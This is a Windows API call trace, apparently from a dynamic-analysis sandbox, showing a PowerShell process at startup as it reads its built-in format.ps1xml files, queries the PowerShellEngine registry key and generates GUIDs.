	[0297.422] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] SetErrorMode (uMode=0x1) returned 0x1
	[0297.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0297.424] SetErrorMode (uMode=0x1) returned 0x1
	[0297.424] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0297.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.424] CoTaskMemFree (pv=0x471c50) 
	[0297.427] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0297.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.427] CoTaskMemFree (pv=0x471c50) 
	[0297.427] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0297.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.427] CoTaskMemFree (pv=0x471c50) 
	[0297.428] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0297.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.428] CoTaskMemFree (pv=0x471c50) 
	[0297.428] SetErrorMode (uMode=0x1) returned 0x1
	[0297.428] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0297.429] GetFileType (hFile=0x328) returned 0x1
	[0297.429] SetErrorMode (uMode=0x1) returned 0x1
	[0297.429] GetFileType (hFile=0x328) returned 0x1
	[0297.429] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.430] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.430] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.430] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.431] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.431] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.431] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x9e2, lpOverlapped=0x0) returned 1
	[0297.431] ReadFile (in: hFile=0x328, lpBuffer=0x32dc802, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dc802*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0297.431] ReadFile (in: hFile=0x328, lpBuffer=0x32dd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32dd2b8*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0297.432] CloseHandle (hObject=0x328) returned 1
	[0297.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.432] SetErrorMode (uMode=0x1) returned 0x1
	[0297.432] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0297.432] SetErrorMode (uMode=0x1) returned 0x1
	[0297.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x328) returned 0x0
	[0297.432] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0297.432] CoTaskMemAlloc (cb=0x5a) returned 0x50cad0
	[0297.432] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x50cad0, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0297.433] CoTaskMemFree (pv=0x50cad0) 
	[0297.433] RegCloseKey (hKey=0x328) returned 0x0
	[0297.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.440] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe6d3e4d0, Data2=0xe2c3, Data3=0x4690, Data4=([0]=0xad, [1]=0x23, [2]=0x65, [3]=0x5c, [4]=0x6d, [5]=0x66, [6]=0xd0, [7]=0xf0))) returned 0x0
	[0298.179] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf0e6db59, Data2=0x3289, Data3=0x4cd6, Data4=([0]=0x86, [1]=0xc7, [2]=0x4a, [3]=0xf4, [4]=0x51, [5]=0xb3, [6]=0x1f, [7]=0x13))) returned 0x0
	[0298.180] SetErrorMode (uMode=0x1) returned 0x1
	[0298.180] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0298.181] GetFileType (hFile=0x328) returned 0x1
	[0298.181] SetErrorMode (uMode=0x1) returned 0x1
	[0298.181] GetFileType (hFile=0x328) returned 0x1
	[0298.181] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.181] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.182] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.182] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.182] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.183] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0xfb2, lpOverlapped=0x0) returned 1
	[0298.183] ReadFile (in: hFile=0x328, lpBuffer=0x330753a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x330753a*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.183] ReadFile (in: hFile=0x328, lpBuffer=0x3307e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3307e20*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.183] SetErrorMode (uMode=0x1) returned 0x1
	[0298.183] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0298.184] SetErrorMode (uMode=0x1) returned 0x1
	[0298.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0298.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x328) returned 0x0
	[0298.184] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0298.184] CoTaskMemAlloc (cb=0x5a) returned 0x50cad0
	[0298.184] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x50cad0, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0298.184] CoTaskMemFree (pv=0x50cad0) 
	[0298.184] RegCloseKey (hKey=0x328) returned 0x0
	[0298.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0298.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0298.186] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xbf05764b, Data2=0x9c07, Data3=0x43bb, Data4=([0]=0xbf, [1]=0x20, [2]=0x8e, [3]=0x94, [4]=0x38, [5]=0x25, [6]=0x25, [7]=0x6e))) returned 0x0
	[0298.189] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xd7855e01, Data2=0x549, Data3=0x4d0d, Data4=([0]=0x80, [1]=0xfa, [2]=0xa, [3]=0xad, [4]=0xdd, [5]=0x1a, [6]=0xf9, [7]=0x9d))) returned 0x0
	[0298.190] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x43de227, Data2=0x9773, Data3=0x43bf, Data4=([0]=0xb8, [1]=0x9e, [2]=0xbb, [3]=0x68, [4]=0x4e, [5]=0x1b, [6]=0xba, [7]=0x75))) returned 0x0
	[0298.190] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc34f5d6e, Data2=0xeee3, Data3=0x494c, Data4=([0]=0xa7, [1]=0x2c, [2]=0x38, [3]=0xe9, [4]=0xf1, [5]=0x76, [6]=0xf5, [7]=0x36))) returned 0x0
	[0298.190] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x38f3c25b, Data2=0xe097, Data3=0x4b2a, Data4=([0]=0x8f, [1]=0x36, [2]=0x9b, [3]=0xa6, [4]=0xf1, [5]=0xcc, [6]=0xd, [7]=0x92))) returned 0x0
	[0298.190] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xeb489f67, Data2=0xb4b5, Data3=0x4978, Data4=([0]=0x8a, [1]=0xac, [2]=0xb6, [3]=0xff, [4]=0x5c, [5]=0x4e, [6]=0xf1, [7]=0xa6))) returned 0x0
	[0298.191] SetErrorMode (uMode=0x1) returned 0x1
	[0298.191] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0298.191] GetFileType (hFile=0x328) returned 0x1
	[0298.191] SetErrorMode (uMode=0x1) returned 0x1
	[0298.191] GetFileType (hFile=0x328) returned 0x1
	[0298.191] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.192] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.192] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.192] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.193] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.193] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.193] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0xaca, lpOverlapped=0x0) returned 1
	[0298.193] ReadFile (in: hFile=0x328, lpBuffer=0x33531b2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x33531b2*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.193] ReadFile (in: hFile=0x328, lpBuffer=0x3353b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3353b80*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.194] SetErrorMode (uMode=0x1) returned 0x1
	[0298.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0298.194] SetErrorMode (uMode=0x1) returned 0x1
	[0298.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.194] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x328) returned 0x0
	[0298.194] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0298.194] CoTaskMemAlloc (cb=0x5a) returned 0x50cad0
	[0298.194] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x50cad0, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0298.194] CoTaskMemFree (pv=0x50cad0) 
	[0298.194] RegCloseKey (hKey=0x328) returned 0x0
	[0298.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.950] VirtualQuery (in: lpAddress=0x28b920, lpBuffer=0x28c7e0, dwLength=0x30 | out: lpBuffer=0x28c7e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.950] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x920c7f46, Data2=0xf9f6, Data3=0x4cfa, Data4=([0]=0xad, [1]=0xbb, [2]=0xf6, [3]=0xc3, [4]=0x95, [5]=0x84, [6]=0x40, [7]=0x23))) returned 0x0
	[0298.951] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x2524d371, Data2=0x2242, Data3=0x4a8c, Data4=([0]=0x9e, [1]=0x5f, [2]=0xa2, [3]=0x95, [4]=0xbb, [5]=0xe1, [6]=0x1f, [7]=0x73))) returned 0x0
	[0298.951] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.951] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.951] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x154c6f4e, Data2=0xb022, Data3=0x4add, Data4=([0]=0xad, [1]=0x94, [2]=0x41, [3]=0xf7, [4]=0x4e, [5]=0x4c, [6]=0xac, [7]=0x23))) returned 0x0
	[0298.952] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6cc38d6d, Data2=0x42a5, Data3=0x45f4, Data4=([0]=0x94, [1]=0xa6, [2]=0xc9, [3]=0x56, [4]=0xaf, [5]=0x39, [6]=0x7d, [7]=0xce))) returned 0x0
	[0298.952] VirtualQuery (in: lpAddress=0x28bd20, lpBuffer=0x28cbe0, dwLength=0x30 | out: lpBuffer=0x28cbe0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.952] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.952] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.952] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x7ec212a2, Data2=0x73c0, Data3=0x4690, Data4=([0]=0xb5, [1]=0x14, [2]=0xa7, [3]=0xc7, [4]=0x35, [5]=0xdf, [6]=0x33, [7]=0x47))) returned 0x0
